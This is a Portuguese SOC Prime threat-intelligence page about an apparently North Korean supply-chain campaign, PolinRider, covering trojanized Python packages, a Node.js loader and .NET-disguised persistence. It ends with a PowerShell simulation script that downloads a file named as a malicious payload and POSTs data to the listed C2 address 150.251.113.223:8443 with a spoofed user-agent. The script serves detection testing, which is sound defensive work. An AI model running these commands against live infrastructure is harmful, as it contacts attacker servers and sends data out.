SOC Prime Bias: Critical

15 Sep 2026 14:55 UTC

Campanha PolinRider da RPDC Mostra Atividade de Cadeia de Suprimentos Direto no Teclado

Author Photo
SOC Prime Team linkedin icon Seguir
Campanha PolinRider da RPDC Mostra Atividade de Cadeia de Suprimentos Direto no Teclado
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Um agente de ameaça ligado à Coreia do Norte realizou um ataque à cadeia de suprimentos contra ambientes de desenvolvimento usando pacotes Python trojanizados. A cadeia de intrusão incluiu um carregador Node.js, um implante JavaScript C2 e um ladrão de informações baseado em Python. O agente estabeleceu persistência disfarçando componentes maliciosos como serviços legítimos de otimização do Microsoft .NET.

Investigação

A investigação ocorreu em um ambiente de engano de alta fidelidade, onde uma estação de trabalho corporativa fictícia foi monitorada por 167 horas. Analistas capturaram atividades em tempo real, incluindo execução de payloads maliciosos e preparação de dados. A telemetria coletada expôs toda a cadeia de ataque, desde a comprometimento inicial através de um repositório malicioso até a exfiltração de dados do host.

Mitigação

As organizações devem aplicar varredura rigorosa de dependências em npm, PyPI e outros gerenciadores de pacotes. O filtro de saída deve bloquear conexões HTTP para endereços IP públicos brutos em portas não padrão. Os defensores também devem monitorar mecanismos de persistência incomuns, incluindo tarefas agendadas ou entradas de registro que imitam componentes do Microsoft .NET a partir de caminhos de perfil do sistema.

Resposta

Se for detectada atividade maliciosa, as equipes de segurança devem isolar imediatamente o ambiente de desenvolvimento ou compilação afetado. Os respondedores devem procurar endereços IP de C2 conhecidos e padrões de arquivos suspeitos como SvcHostUpdate.py. Deve-se também realizar uma revisão forense das dependências de terceiros recentemente instaladas, juntamente com uma auditoria do perfil do sistema para detectar artifacts do

OtimizaçãoCLRMicrosoft.

Ainda estamos atualizando esta parte.

Execução da Simulação

  • Narrativa do Ataque & Comandos: O adversário visa progredir a infecção obtendo uma carga útil de segunda etapa e exfiltrando dados de configuração roubados. Para imitar PolinRider, o invasor fará:

    1. Use curl or Invoke-WebRequest para buscar um arquivo fictício de um URL “raw” do GitLab.
    2. Realizar uma solicitação POST para o IP C2 identificado (150.251.113.223:8443) enquanto falsifica um User-Agent que corresponda ao padrão rotating.*agent .
    3. Conectar-se a dns.catbox.moe para simular um controle de ritmos C2 secundário ou entrega de carga. Essas ações são projetadas para acionar os três critérios de seleção distintos na regra Sigma.
  • Script de Teste de Regressão:

     # Script de Simulação PolinRider
    
      Write-Host "[!] Iniciando Simulação de Rede PolinRider..." -ForegroundColor Cyan
    
      # 1. Acionar Seleção 2: Buscando do GitLab Raw
      Write-Host "[*] Acionando Seleção 2: Busca GitLab Raw..."
      Invoke-WebRequest -Uri "https://gitlab.com/api/v4/raw/malicious_payload.exe" -Method Get -UserAgent "Mozilla/5.0"
    
      # 2. Acionar Seleção 1: POST para C2 com User-Agent Rotativo
      Write-Host "[*] Acionando Seleção 1: C2 POST com User-Agent Rotativo..."
      $c2Url = "http://150.251.113.223:8443/upload"
      $fakeUA = "Mozilla/5.0 rotating-agent-v1.2"
      Invoke-WebRequest -Uri $c2Url -Method POST -UserAgent $fakeUA -Body "dummy_data"
    
      # 3. Acionar Seleção 3: Padrão DNS/URL para catbox.moe
      Write-Host "[*] Acionando Seleção 3: Conexão catbox.moe..."
      Invoke-WebRequest -Uri "https://dns.catbox.moe/check" -Method Get -UserAgent "Mozilla/5.0"
    
      Write-Host "[+] Simulação Completa. Verifique o SIEM para alertas." -ForegroundColor Green
  • Comandos de Limpeza:

     # Nenhuma alteração persistente foi feita no sistema; 
      # Conexões de rede são efêmeras. 
      # Nenhum arquivo foi gravado em disco nesta simulação.
      Write-Host "[*] Limpeza: Nenhum arquivo ou chave de registro foi modificado. Simulação limpa." -ForegroundColor Cyan